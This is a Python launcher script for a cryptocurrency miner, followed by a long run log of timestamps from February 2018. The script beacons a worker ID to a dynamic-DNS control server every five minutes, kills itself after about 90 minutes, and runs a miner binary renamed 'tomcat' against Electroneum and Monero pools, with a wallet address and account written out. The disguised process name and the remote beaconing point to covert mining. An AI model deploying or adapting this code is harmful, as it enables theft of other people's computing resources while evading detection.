import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:19:01.748344
#2018-02-17 17:06:04.455663
#2018-02-17 18:53:06.984732
#2018-02-17 20:40:01.355972
#2018-02-17 22:27:02.008729
#2018-02-18 00:10:04.011648
#2018-02-18 02:01:07.082197
#2018-02-18 03:49:01.412747
#2018-02-18 05:37:01.688957
#2018-02-18 07:30:04.238121
#2018-02-18 09:18:06.533409
#2018-02-18 11:04:07.441996
#2018-02-18 12:51:01.916302
#2018-02-18 14:37:04.771272
#2018-02-18 16:26:06.774933
#2018-02-18 18:15:09.447371
#2018-02-18 20:01:04.590032
#2018-02-18 21:48:03.723212
#2018-02-18 23:37:05.528904
#2018-02-19 01:23:05.037268
#2018-02-19 03:11:07.546534
#2018-02-19 04:56:05.529998
#2018-02-19 06:40:08.891774
#2018-02-19 08:30:09.704644
#2018-02-19 10:19:07.350161
#2018-02-19 12:07:05.968368
#2018-02-19 13:53:07.687664
#2018-02-19 15:43:08.697908
#2018-02-19 17:31:01.598713
#2018-02-19 19:18:08.270474
#2018-02-19 21:07:05.214905
#2018-02-19 22:54:03.576710
#2018-02-20 00:37:07.231967
#2018-02-20 02:26:06.612761
#2018-02-20 04:16:06.614708
#2018-02-20 06:01:07.347882
#2018-02-20 07:46:08.021243
#2018-02-20 09:31:06.370597
#2018-02-20 11:14:06.871853
#2018-02-20 13:02:07.674383
#2018-02-20 14:47:04.364657
#2018-02-20 16:33:07.127547
#2018-02-20 18:19:07.721140
#2018-02-20 20:10:09.693862
#2018-02-20 21:57:06.512137
#2018-02-20 23:40:01.742900
#2018-02-21 01:24:07.756522
#2018-02-21 03:12:05.441260
#2018-02-21 04:59:05.081668
#2018-02-21 06:47:01.823977
#2018-02-21 08:31:06.808168
#2018-02-21 10:17:04.857558
#2018-02-21 12:04:08.300078
#2018-02-21 13:52:08.208277
#2018-02-21 15:38:02.369672
#2018-02-21 17:28:08.523703
#2018-02-21 19:15:08.568974
#2018-02-21 21:03:01.983821
#2018-02-21 22:49:06.303913
#2018-02-22 00:39:08.093386
#2018-02-22 02:26:01.995998
#2018-02-22 04:13:06.586629
#2018-02-22 05:57:06.965488
#2018-02-22 07:45:04.760060
#2018-02-22 09:34:07.978575
#2018-02-22 11:20:04.123600
#2018-02-22 13:06:08.197826
#2018-02-22 14:56:01.332860
#2018-02-22 16:41:05.068257
#2018-02-22 18:26:09.108076
#2018-02-22 20:19:03.897974
#2018-02-22 22:04:08.316915
#2018-02-22 23:50:07.255556
#2018-02-23 01:37:04.482120
#2018-02-23 03:25:01.464634
#2018-02-23 05:10:06.910155
#2018-02-23 06:55:05.503082
#2018-02-23 08:46:04.604252
#2018-02-23 11:04:07.186101
#2018-02-23 12:58:09.122135
#2018-02-23 14:43:05.312150
#2018-02-23 16:33:07.357795
#2018-02-23 18:21:07.295271
#2018-02-23 20:06:04.439545
#2018-02-23 21:51:01.938959
#2018-02-23 23:37:07.804502
#2018-02-24 01:26:06.873543
#2018-02-24 03:16:04.775122
#2018-02-24 05:00:04.985940
#2018-02-24 06:50:06.492821
#2018-02-24 08:33:05.955224
#2018-02-24 10:20:07.124950
#2018-02-24 12:15:04.450042
#2018-02-24 14:04:01.653077
#2018-02-24 15:52:04.659985
#2018-02-24 17:44:04.498506
#2018-02-24 19:28:07.320935
#2018-02-24 21:18:07.539762
#2018-02-24 23:57:03.766756
#2018-02-25 04:26:01.593167
#2018-02-25 08:08:01.706575